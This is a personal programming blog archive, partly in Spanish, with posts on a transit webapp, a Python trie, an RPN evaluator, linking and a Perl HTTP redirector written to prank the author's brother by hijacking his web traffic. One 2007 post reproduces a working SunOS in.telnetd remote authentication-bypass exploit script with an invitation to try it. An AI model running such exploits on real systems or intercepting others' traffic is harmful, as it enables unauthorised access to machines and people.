29 03/11
13:08

Local public transportation in my pocket

I’ve lately spent some time developing a webapp for mobile devices to interact with some of the data published by the Gijón City Council. More specifically, data about local public land transportation schedule and live arrivals. The way they are presenting that information for mobile devices at the moment is very very heavy and slow, so I thought it may be useful to do something simpler for personal usage.

Basically, it is a simple web service that intensively caches data (to avoid stressing the data origin with many requests) and a fancy AJAX-powered frontend with some CSS with mobile browsers in mind (works flawlessly on Android’s browser and Mobile Safari). Additionally, if you add it as a bookmark to your iPhone’s home screen it behaves like a native application (you know, splash screen, custom icon, taskbar and so on).

I’m now working on client-side caching using HTML5 caching for offline usage. This way the application will boot way faster. It’s almost done, but it still needs some debugging.

I don’t intend to make it public for now. However, if you find it useful feel free to drop me a line. Beta testers are always welcome (but unfortunately won’t be rewarded).

This is how it looks like at the moment. The source will be released soon.

Update (23:26): Android screenshots provided by Javier Pozueco. Thanks buddy!

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

24 03/11
12:31

Search term completion using a search tree

Google search box completion

*lol*

Nowadays it’s very usual to find websites offering hints while you’re typing on a search box. Google is a pretty good example of it. But, how could it be implemented?

This feature could be implemented either in the client side or in the server side. If the word list is big (usually it is), it’s recommended to keep the lookup logic in the server side to save some bytes while transferring the page to the client and also to save some computing power using server-side caches (cool when you plan to serve many requests).

Either way, there should be a data structure somewhere containing the word list and an algorithm to do the lookup. The simplest approach may be to use a list to store the words and issue something like this when you want to get a list of hints for a given prefix:

filter(lambda x: x.startsWith(prefix), word_list)

That’s Python’s filter, but it works the same way the well-known Haskell’s first-order function filter does. It builds a new list with the elements of the original list (word_list) that match the predicate (the lambda function).

Although the results can (and should) be cached, the very first lookup (or when the cache expires) would be very inefficient because the entire list must be traversed and that operation will take linear time. Not bad, but when the size of the problem gets bigger (i.e. more and more words in the database) the lookup process may be too slow, especially whether you’re serving several users at the same time. If the list was sorted, the execution time could be improved a little bit by writing a more sophisticated algorithm, but let’s keep it that way for now.

Fortunately, there are better and faster ways to face the problem. If you don’t want to write code (usually the best choice) you may use some high-performance indexing engine such as Apache Lucene. But if you prefer the ‘do-it-yourself’ way (for learning purposes), a search tree (more specifically, a trie or a prefix tree) is a good approach.

I’ve poorly benchmarked both alternatives (the list and the tree) and as expected the tree is pretty quicker generating hints. What I did was to feed both data structures with the content of an American English word list holding ~640k words (debian package wamerican-insane).

So, assuming four is a reasonable minimum prefix length, I measured the time it would take to get a list of words prefixed by hous (yes, just one, remember I said this was a poor benchmark? ;). Unsurprisingly, it took around 230 times longer for the list alternative to generate the hints (438.96 ms vs 1.92 ms). Wow.

My implementation of the tree is as follows. The API is quite straightforward, the “hot” methods are put and get_hints. I’ve stripped off the test suite for space reasons.

Usage example:

>>> tree = HintSearchTree()
>>> tree.put("nacho")
>>> tree.put("nachos")
>>> tree.put("nachete")
>>> tree.get_hints("nach")
['nachete', 'nacho', 'nachos']
>>> tree.get_hints("nacho")
['nacho', 'nachos']
>>> tree.delete("nacho")
>>> tree.get_hints("nacho")
['nachos']
>>> tree.count_words()
2
>>> tree.get_hints("n")
['nachete', 'nachos']
>>> tree.is_indexed("nachete")
True
>>> tree.is_indexed("nach")
False
>>> tree.empty()
False
class HintSearchTreeNode(object):
class HintSearchTreeNode(object):
  def __init__(self, parent=None, terminal=False):
    self._children = {}
    self._terminal = terminal
    self._parent = parent
 
  @property
  def children(self):
    return self._children
 
  @property
  def terminal(self):
    return self._terminal
 
  @terminal.setter
  def terminal(self, value):
    self._terminal = value
 
  @property
  def parent(self):
    return self._parent
 
class HintSearchTree(object):
  def __init__(self):
    self._root = HintSearchTreeNode()
 
  def put(self, word):
    """Adds a word to the tree."""
    # TODO: Sanitize 'word'
    if len(word) > 0:
      self._put(self._root, word)
 
  def count_words(self):
    """Retrieves the number of indexed words in the tree."""
    return self._count_words(self._root)
 
  def is_indexed(self, word):
    """Returns True if 'word' is indexed."""
    node = self._find(self._root, word)
    return node is not None and node.terminal is True
 
  def get_hints(self, prefix):
    """Returns a list of words prefixed by 'prefix'."""
    return self._match_prefix(self._root, prefix)
 
  def delete(self, word):
    """Deletes 'word' (if exists) from the tree."""
    terminal = self._find(self._root, word)
    if terminal is not None:
      terminal.terminal = False
      self._prune(terminal.parent, word)
 
  def empty(self):
    """Returns True if the tree contains no elements."""
    return len(self._root.children) == 0
 
  def _put(self, node, word, depth=0):
    next_node = node.children.get(word[depth])
    if next_node is None:
      next_node = HintSearchTreeNode(parent=node)
      node.children[word[depth]] = next_node
    if len(word)-1 == depth:
      next_node.terminal = True
    else:
      self._put(next_node, word, depth+1)
 
  def _count_words(self, node):
    words = 1 if node.terminal is True else 0
    for k in node.children:
      words += self._count_words(node.children[k])
    return words
 
  def _match_prefix(self, node, prefix):
    terminal = self._find(node, prefix)
    if terminal is not None:
      return self._harvest_node(terminal, prefix)
    else:
      return []
 
  def _harvest_node(self, node, prefix, path=""):
    hints = []
    if node.terminal is True:
      hints.append(prefix + path)
    for k in node.children:
      hints.extend(self._harvest_node(node.children[k], prefix, path+k))
    return hints
 
  def _find(self, node, word, depth=0):
    if depth == len(word):
      return node
    else:
      child = node.children.get(word[depth])
      if child is not None:
        return self._find(child, word, depth+1)
      else:
        return None
 
  def _prune(self, node, word):
    if self._count_words(node.children[word[-1]]) == 0:
      del node.children[word[-1]]
      if len(node.children) == 0 and node.parent is not None \
          and node.terminal is not True:
        self._prune(node.parent, word[:-1])

The code is released in the public domain.

24 02/11
22:55

Some Perl to redirect HTTP requests

After almost a year without publishing a single post, it seems this week I’m going to beat all my records.

A week ago, I wanted to prank my brother for a while. Nothing sophisticated… just some Iptables rules, Tinyproxy and HTTP magic. To go ahead with my evil plans, I needed “something” able to redirect a HTTP request. Actually, there are several ways to do that: Apache redirects, Tornado, Netcat* and so on. These alternatives are fast, bulletproof and time-saving, but not fun.

As many of you probably know, I didn’t get a job yet. That necessary means that I’ve got plenty of free time to waste. So… what did I do? I wrote some Perl and today I’m publishing the source code just in case someone finds it useful somehow. Like the previous entry, it’s published in the public domain.

The script just collects connections, issues 301 back (Moved Permanently) and sets Location to the URI specified as a command line argument (option -u). It lacks some security checks (left as an exercise to the reader) but it does what it is supposed to do. You may likely spot some silly bugs as I haven’t spent much time reading it again. Reports are welcome!

For those wondering, the prank was a big success. I’m afraid I can’t spare any detail by now but it turns out my bro is still thinking that his computer has been cracked.

Example invocation:

$ perl redir.pl -p 7070 -v -t 3 -u http://31337.pl
2011/02/24 21:41:54 Listening on port 7070
2011/02/24 21:41:54 Redirecting HTTP requests to: ‘http://31337.pl’
2011/02/24 21:41:54 3 thread(s) working under the hood

And finally the source code:

use warnings;
use threads;
 
use Thread::Queue;
use POSIX;
 
use IO::Socket::INET;
use HTTP::Request;
use HTTP::Status qw(:constants status_message);
 
use Getopt::Long;
use DateTime::Format::HTTP;
use Data::Validate::URI qw(is_http_uri);
use Log::Log4perl qw(:easy);
 
use constant MAX_THREADS => 10;
use constant MAX_LEN_HEADERS_BUFFER => 8*1024;
use constant DEFAULT_REDIRECT_URI => "http://www.example.org";
use constant DEFAULT_PORT => 80;
use constant DEFAULT_POOL_SIZE => 3;
 
my $redir_uri = DEFAULT_REDIRECT_URI;
my $server_port = DEFAULT_PORT;
my $thread_pool_size = DEFAULT_POOL_SIZE;
my $verbose;
 
GetOptions('url=s' => \$redir_uri, 
           'port=i' => \$server_port,
           'threads=i' => \$thread_pool_size,
           'verbose'  => \$verbose) or exit -1;
 
die "Invalid redirect URI (e.g. http://www.example.org)\n" unless is_http_uri($redir_uri);
die "Invalid port (e.g. 8080)\n" unless 0 < $server_port && $server_port < 2**16;
die "Invalid pool size (should be in [1..".MAX_THREADS."])\n" 
            unless 0 < $thread_pool_size && $thread_pool_size <= MAX_THREADS;
 
Log::Log4perl->easy_init( level => $verbose? $DEBUG : $INFO );
 
my $pending = Thread::Queue->new(); 
 
my $lsock = IO::Socket::INET->new( LocalPort => $server_port,
                                   Proto => 'tcp',
                                   Listen => 1,
                                   Reuse => 1 ) or die "Couldn't bind listening socket ($!)\n"; 
 
INFO("Listening on port $server_port\n");
INFO("Redirecting HTTP requests to: '$redir_uri'\n");
 
my @workers = ();
for (1..$thread_pool_size) {
    if ($thread = threads->create("worker")) {
        push(@workers, $thread);
    }
}
 
DEBUG(sprintf("%d thread(s) working under the hood\n", $#workers+1));
 
# Set a tidy shutdown just in case an external agent SIG{INT,TERM}s the process
$SIG{'INT'} = $SIG{'TERM'} = sub {
    # Dirty hack. threads->kill() does not wake up the thread :(
    for (1..@workers) {
        $pending->enqueue(-1);
    }
    for (@workers) {
        DEBUG(sprintf("Worker %d terminated: %d clients served\n", $_->tid, $_->join())); 
    }
    close($lsock); 
    exit 0; 
};
 
while(1) {
    my $csock = $lsock->accept() or next;
    $pending->enqueue(POSIX::dup(fileno $csock));
    DEBUG(sprintf("New client enqueued: %s:%s\n", $csock->peerhost, $csock->peerport));
    close($csock);
}
 
sub worker {
    my $clients_served = 0;
    while(my $fd = $pending->dequeue) { # API promises thread safety :-)
        if ($fd == -1) {
            return $clients_served;
        }
 
        my $sock = IO::Socket::INET->new_from_fd($fd, "r+");
        DEBUG(sprintf("Dequeued client %s:%d by worker %d.\n", $sock->peerhost,
                            $sock->peerport, threads->tid()));
 
        my $buf = "";
        while(<$sock>) {
            # CAUTION: there isn't any self protection against very long lines
            last if /^\r\n$/;
            $buf .= $_;
            goto BYE if length $buf > MAX_LEN_HEADERS_BUFFER;
        }
 
        if (my $request = HTTP::Request->parse($buf)) {
            INFO(sprintf("[%s] %s {%s}\n", $request->method, $request->uri, $sock->peerhost));
        }
 
        printf $sock "HTTP/1.1 %d %s\r\n", 
            HTTP_MOVED_PERMANENTLY, status_message(HTTP_MOVED_PERMANENTLY);
        printf $sock "Date: %s\r\n", DateTime::Format::HTTP->format_datetime;
        print $sock "Location: $redir_uri\r\n";
        print $sock "Server: Simple HTTP Redirection/0.1 ($^O)\r\n";
        print $sock "Connection: close\r\n";
        print $sock "\r\n";
 
BYE:  
        $clients_served++;
        close($sock);
    }
}

(*) just an approach, may drop connections:

while [ 1 ]; 
 do echo -e "HTTP/1.1 301 Moved Permanently\r\nLocation: http://31337.pl\r\n\r\n" | nc -l 7070; 
done

23 02/11
01:03

Reverse Polish Notation Evaluation in Python

This introduction is followed by some Python code (function evaluate_postfix_expr) to evaluate expressions (only integers, but may be extended with ease) in Reverse Polish Notation (RPN). Some simple tests are also included in the bundle.

I agree it’s a little useless, but I thought it might be useful for someone (CS students maybe?). If you want to examine the stack in each iteration you only have to turn debugging on. That can be accomplished by changing logging.INFO to logging.DEBUG (line 7).

Copy, distribute or do whatever you want with it. It’s released in the public domain.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
#!/usr/bin/env python
 
import logging
import re
import unittest
 
logging.basicConfig(level=logging.INFO)
 
operators_table = {'+': int.__add__, 
             '-': int.__sub__,
             '*': int.__mul__,
             '/': int.__div__,
             '^': int.__pow__}
 
class ExpressionError(Exception):
    def __init__(self, message):
        self._message = "Expression error: %s" % message
    def _get_message(self): 
        return self._message
    message = property(_get_message)
 
class TestEvaluation(unittest.TestCase):
    def test_correct(self):
        self.assertEqual(666, evaluate_postfix_expr("666"))
        self.assertEqual(2+3-6, evaluate_postfix_expr("2 3 + 6 -"))
        self.assertEqual(2*3+4, evaluate_postfix_expr("2 3 * 4 +"))
        self.assertEqual(2*(3+4), evaluate_postfix_expr("2 3 4 + *"))
        self.assertEqual(3**4, evaluate_postfix_expr("3   3  *     3  *      3 *"))
        self.assertEqual((7/2)**4, evaluate_postfix_expr("7 2 / 4 ^"))
        self.assertEqual((2**3)**4, evaluate_postfix_expr("2 3 ^ 4 ^"))
        self.assertEqual(5+((1+2)*4)-3, evaluate_postfix_expr("5 1 2 + 4 * 3 - +"))
 
    def test_malformed(self):
        self.assertRaises(ExpressionError, evaluate_postfix_expr, "+")
        self.assertRaises(ExpressionError, evaluate_postfix_expr, "2 +")
        self.assertRaises(ExpressionError, evaluate_postfix_expr, "+ 2 2")
        self.assertRaises(ExpressionError, evaluate_postfix_expr, "2 2")
        self.assertRaises(ExpressionError, evaluate_postfix_expr, "2 2 + -")
        self.assertRaises(ExpressionError, evaluate_postfix_expr, "a 2 -")
 
def evaluate_postfix_expr(expr):
    atoms = re.split(r"\s+", expr)
    stack = [] 
    for atom in atoms:
        if atom in ["+", "-", "*", "/", "^"]:
            try:
                op2 = stack.pop()
                op1 = stack.pop()
            except IndexError:
                raise ExpressionError("Too few operands (unbalanced)")
            logging.debug("Calculating %d %s %d" % (op1, atom, op2))
            atom = operators_table[atom](op1, op2)
        else:
            try:
                atom = int(atom)
            except ValueError:
                raise ExpressionError("Unable to parse '%s' as integer" % atom)
 
        try:
            stack.append(atom)
        except MemoryError:
            raise ExpressionError("Too long expression")
 
        logging.debug("Pushed element %d. Stack status: %s" % (atom, stack))
 
    if len(stack) == 1:
        return stack.pop()
    else:
        raise ExpressionError("Too many operands (unbalanced)")
 
if __name__ == "__main__":
    unittest.main()

09 05/08
21:38

Yay, you won!

Some people are born to be a winner, you‘re one of them. Congratulations dude! ;)

30 08/07
11:27

Example: How to statically and dynamically link your executables

People usually uses Google, among other things, to look for hints about how to do small tasks. Hopefully, you will find the hint you were looking for in somebody’s blog, because he or she had the same problem time ago and decided to talk about it.

Last night, I was a bit bored and started writing a dumb set of files to introduce people how static and dynamic linking work, so trying to put my two cents and add a new hint to the wild wild web, I’m sharing it. The C source files are practically useless, therefore pay attention to the Makefile, the magic is in there.

If you’re downloading it only to compile, execute and see what happens forget about it, the program is completely silly. Otherwise, probably the Makefile is buggy somewhere so bug reports are welcome. For teaching purposes, try, for example, breaking the ABI and see what happens.

Google, index this post please!

Update: This example does not cover autotools/libtool

11 04/07
12:31

Ingeniería del software, sabor universitario

Voy a aprovechar mi blog para poner aquí lo que, según fuentes bastante fiables, dijo un profesor de Ingeniería del Software a sus alumnos hace escasos días.

Obviamente no digo ni nombre, ni curso, ni titulación, ni incluso Universidad (aunque me imagino que supongais bien) ya que es lo que menos importa. También advierto que la cita no es literal, pero creo que para entendernos servirá:

No os aconsejo utilizar sistemas de SCM porque os van a complicar la vida, no vais a desarrollar bien, no seais tecnócratas.

Aún no puedo salir de mi asombro, que un profesor de Ingeniería del Software diga eso, sobre todo que “os van a complicar la vida” cuando el asunto es precisamente al revés. En mi opinión, ya me parece indispensable usarlos incluso desarrollando una persona sola, pero me parece un suicidio no utilizarlo cuando las personas en el grupo de trabajo son más de dos (como es el caso). Y no sólo lo pienso yo, lo piensa Debian, Google, Kernel.org, Lufthansa, NASA, CERN, CSC (¡Cualquier empresa con un equipo un poco decente lo usa todos los días!)… y no sólo empresas grandes, sino cualquier grupo de personas que intenten desarrollar algo juntos (sí, esa empresa en la que estás pensando también lo usa).

Sinceramente, me siento avergonzado de que se digan estas cosas en la Universidad. Sigan formando así Ingenieros, por algo seguimos en la cola de Europa.

Y tú, ¿todavía te pasas un .zip con tus compañeros?

13 02/07
15:46

SunOS 5.10/5.11 owned, really!

Try it or get more details.


#!/bin/sh
echo ""
echo "SunOS 5.10/5.11 in.telnetd Remote Exploit by Kingcope kingcope@gmx.net"
if [ $# -ne 2 ]; then
echo "./sunos HOST ACCOUNT"
echo "e.g.: ./sunos localhost bin"
exit
fi
telnet -l"-f$2" $1

13 11/06
15:56

Share the innovation

This is the shout of the day, probably of the year: Sun opens Java SE, ME and other stuff

20 02/06
10:01

Estrenando libro de socios

Aprovechando mi “amistad” con el delfín este fin de semana me he dedicado a escribir desde la nada una aplicación hecha en PHP para llevar la gestión de los socios de una manera más cómoda.

El código HTML del nuevo programa valida el estándar XHTML 1.1 y usa las hojas de estilo escritas por Diego Berrueta y Páblo López para la web de AsturLiNUX, para lograr un aspecto visual más confortable.

Actualmente ya tengo migrados los datos de los socios a este nuevo gestor, pero prolongaré un poco más el tiempo de prueba de esta aplicación antes de liberarla (antes tendré que añadir más control de errores que para uso personal no eran necesarios, o eso creo), que seguro le viene bien a otra Asociación que funcione de manera similar a la nuestra. Este nuevo sistema proporcionará al Secretario un entorno mucho más amigable para llevar el control del libro, permitiendo automatizar tareas utilizando macro operaciones más facilmente, como por ejemplo avisar mediante correo electrónico al interesado cuando se confirme el pago de una cuota o poder mandar recordatorios de manera automática.
Gracias a Rastreador por sus comentarios sobre la accesibilidad del interfaz, gracias a él, he logrado hacer el entorno un poco más amigable. Os enseñaría como me ha quedado, pero no me apetece mucho ponerme a hacer screenshots, quizás otro día.

Cuando libere el software ya os mantendré informados.

29 08/05
18:11

MGE UPS Nagios Perl Script

He tenido que escribir para el trabajo algún que otro plugin de Nagios estoy intentando liberar bajo licencia GPL todo lo que puedo, aquí os queda el enlace por si os hace falta en algún momento